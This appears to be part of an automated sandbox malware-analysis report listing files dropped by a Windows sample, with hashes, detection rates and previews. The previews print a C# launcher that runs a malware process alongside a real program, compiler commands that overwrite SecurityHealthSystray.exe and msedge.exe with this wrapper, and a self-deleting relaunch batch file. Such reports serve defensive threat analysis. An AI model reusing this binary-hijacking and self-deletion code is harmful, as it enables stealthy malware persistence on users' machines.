                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136413900497188
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.040363848746179
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMstiFkD:JNVQIbSfhV7TiFkMSfhWLSMpFkD
                                                          MD5:75A229CEECEB1BC62AFA8F49761BA4AC
                                                          SHA1:7BF75A0477F515A1B8EE824A3A91CFD11EA59798
                                                          SHA-256:1888CF0EA70DDAD9CBB0491B134B2A99F116CF1E8DC08DB1BD51C454DAAB756D
                                                          SHA-512:85D607A1D86F322193D570E9BDAF58E36F8061AFBEE8BB5C3AF66221499618141028975CB615216D4B2D2945054781F6D0AFE6373D3748C467E38971C222F59D
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):251
                                                          Entropy (8bit):5.102860143373494
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fPwvAhyA:Hu7L//TRq79cQyX19
                                                          MD5:6AE68FC91C6C6394BEA0061BAFD2F000
                                                          SHA1:CE5659393ED32BEAD28BBB02A9A7C4C4EF6B21CE
                                                          SHA-256:B335C04803841A8B0B7F35E21AF21DD7411AB73DA9161580E42C1107E29C7107
                                                          SHA-512:0AF3A3C42448741415B6A2C1255C41BA31A5DC26B6DE6B4EFDC3DCFB565B316E2E8C0509C89FEF23A916832C205BE39728E928367A279C11BD967206F718A9AF
                                                          Malicious:false
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.0.cs"
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):752
                                                          Entropy (8bit):5.2618667030490975
                                                          Encrypted:false
                                                          SSDEEP:12:KMi/I/u7L//TRq79cQyX14KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyX14Kax5DqBVKVrdFAw
                                                          MD5:9C1234B2729AFA9E27676E848DBD9BBA
                                                          SHA1:74AC9B0DF10CE25D73A2D79E04FD6B2CAE5308B7
                                                          SHA-256:03AC9CADE0541D2368780A3CAF5D860EE4006D1D4FDE8EC5CEFBC7BE71020CBB
                                                          SHA-512:6932EB1DCA7C916555ABCBBA08BA629FA872885405FCF59F8B2BA691588E6253295851C5684C4864EEF8B43192151F00E54CFC8F63F4A971C9FD285729BB635C
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):215
                                                          Entropy (8bit):5.178400887698562
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE1NJAc9t8jKOZG1923frh:HTg9uYDEx5P8FF
                                                          MD5:733592B1508E2637AB956E89B7059ACE
                                                          SHA1:7951432BCEC0F2D138670BAE5B2970F501CD7EE1
                                                          SHA-256:6135AE34B33EFBCE390CBBAE2BA2FE88715596E544F4A67E754B0533A586E4DC
                                                          SHA-512:D68481221922BE9D9BDACC50D071D3C31036463058D071CD51D085389C253C9B900C4BC70C785AB29C279BEF685E0EA256049D804488CAFF81F859C5EB1B712B
                                                          Malicious:false
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\9XHFe6y4Dj.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lE7emhVBWP.bat"
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.103465189601645
                                                          Encrypted:false
                                                          SSDEEP:3:x2huCQ:x3CQ
                                                          MD5:7F98B6D33C1A046E4DA8DBF71BC1F469
                                                          SHA1:D017C5E2984371AC8E55452EEE7B0AD17B91BD5B
                                                          SHA-256:65E01DACDA64052AC781C19A872BC2B9E423CEA59052E3A45150D8C4B3A328AD
                                                          SHA-512:F882FC2DC32E64D10F7D7C7E339AFD13F5736112F49564D5D081CC5A5C69C39BEC6B1F23C9BB217FDEFCACE2001302F46A79CC93F98B2F3593B316F5FBB018DD
                                                          Malicious:false
                                                          Preview:V99z9b8IKYZNZVgiVSXlcsRpI
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8439810553697228
                                                          Encrypted:false
                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):425
                                                          Entropy (8bit):5.064035109202258
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LSMstiFkD:JNVQIbSfhWLzIiFkMSfhWLSMpFkD
                                                          MD5:D530B71984B123F5C45E33175621853E
                                                          SHA1:9F197EFBDF876F77A9987F4B1B482C0C6D018BFC
                                                          SHA-256:E5F6E41E949694668C63E0A86BFB8DC9901C184B5914786CD6A2921FE80BAA79
                                                          SHA-512:9AC402E917F4A2F500EED62CEE750091EACF48C3A9C3F54C7625808ACE380F213B011C0ECEA961B0863F9191B824E7903F6E383973A34AE2335A468F5B6818F2
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):266
                                                          Entropy (8bit):5.108542849187747
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fY8bn:Hu7L//TRRzscQyJn
                                                          MD5:290F3C6C8E52A2713B72CA6449AF8E80
                                                          SHA1:A9E9BAEB37145788A8208B862A465C397A378F14
                                                          SHA-256:A75E233216CEAECF4DCEDAB228602EB2421DF4EC347A61BB75BD067D1229FD4C
                                                          SHA-512:CD7F5B0878FEFA934853E31C2012140B34E9DCA91C605806F0A4784946CA4F1E9FAA81B160D7C648A899CC61BC34906C66DC9B594E1857C4791DC0AE1A118F20
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.0.cs"
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):767
                                                          Entropy (8bit):5.241559310435716
                                                          Encrypted:false
                                                          SSDEEP:12:KMi/I/u7L//TRRzscQyJuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstyJuKax5DqBVKVrdFAMb
                                                          MD5:386F6AF968FBBDFBE89ECA167A0800AE
                                                          SHA1:F1E1358E3CEE5CDE701FCC48720E4FDC9DD31FB0
                                                          SHA-256:678F4C94F550AD0356E46A0E6F13947D07DCF338CF07389E6082AE2AF859E90F
                                                          SHA-512:30266F51B08DE641D8DBBBD502B724EE6F87000BCCDD914444312897D19E2CC32E54D5DFEBD0C20F6E6B51DB395432B2545D1D3E823C849EB8D5832213D97915
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.243856189774724
                                                          Encrypted:false
                                                          SSDEEP:3:o4BUGvY59n:oGvYjn
                                                          MD5:3020C6550CC6F82C9CDDEAD57E26E7E2
                                                          SHA1:17089D94241ADFE98045F051B53E9B98E60BA891
                                                          SHA-256:3DF91EEB65687CB5B3D392B0F312400F3C203229F6C7A81A177CF5FD208DCCB0
                                                          SHA-512:590E3C5F814F0E56D02BDA72A5448E0788DB513402E533D0F91689CCB87358BEDFA0D4E30743B07530BA79DEEDE6A4AF968AF0F21B30B153083A7FD0750E86FC
                                                          Malicious:false
                                                          Preview:BlCcEQXmmRdTwcJ8IDTRvre9X
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):203
                                                          Entropy (8bit):5.721267403383102
                                                          Encrypted:false
                                                          SSDEEP:6:pt0RBZ8QbTXcXQcFn9rXPVJAv3EAkEnvd:pGRBZ8QPcdlrUEhOvd
                                                          MD5:DA020A76235514A014E9CE7C8BAAF0DE
                                                          SHA1:935831FADD88F5DDCD7A3CE60C51ADA9E9F5993A
                                                          SHA-256:8143DBCFAEAED243E7E023537F91989816E7AB24AEA16E8B69F21DE0BFD6A415
                                                          SHA-512:08DDF3BCE29D19CFC38F71F147150C8259236C091D572709808C54BD897DD2CB31220214D06486D09A6DCC480469FE4B58131C0E391834FBC9B9A6B19F74DCA9
                                                          Malicious:false
                                                          Preview:ueUHONO2hqoTi2jQtd0UQ41CWGWbngEdabaoAocY3YSOpiObm8ePhn50mSuH0xPAmL2Gb5QEAcb2lnXy25yoCy5xgkBs4UhFISlepH9qsZPFLCP846P58k8xPFk13hKq5WtTB3Iv5H6mj0leVCx8FlGiTyOjhIxKOjJzS57BxeA0oVNZeGf0tMkUPL9NojNwUvYAqvLZFwK
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Joe Sandbox View:
                                                          • Filename: 12Vjq7Yv2E.exe, Detection: malicious
                                                          • Filename: 7WyBcig6e3.exe, Detection: malicious
                                                          • Filename: kBY9lgRaca.exe, Detection: malicious
                                                          • Filename: lv961v43L3.exe, Detection: malicious
                                                          • Filename: RRjzYVukzs.exe, Detection: malicious
                                                          • Filename: FMd6ntIhQY.exe, Detection: malicious
                                                          • Filename: 5Aw2cV5m0c.exe, Detection: malicious
                                                          • Filename: AvQTFKdsST.exe, Detection: malicious
                                                          • Filename: 5WbBcHi91R.exe, Detection: malicious
                                                          • Filename: ggJWCFp2S3.exe, Detection: malicious
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
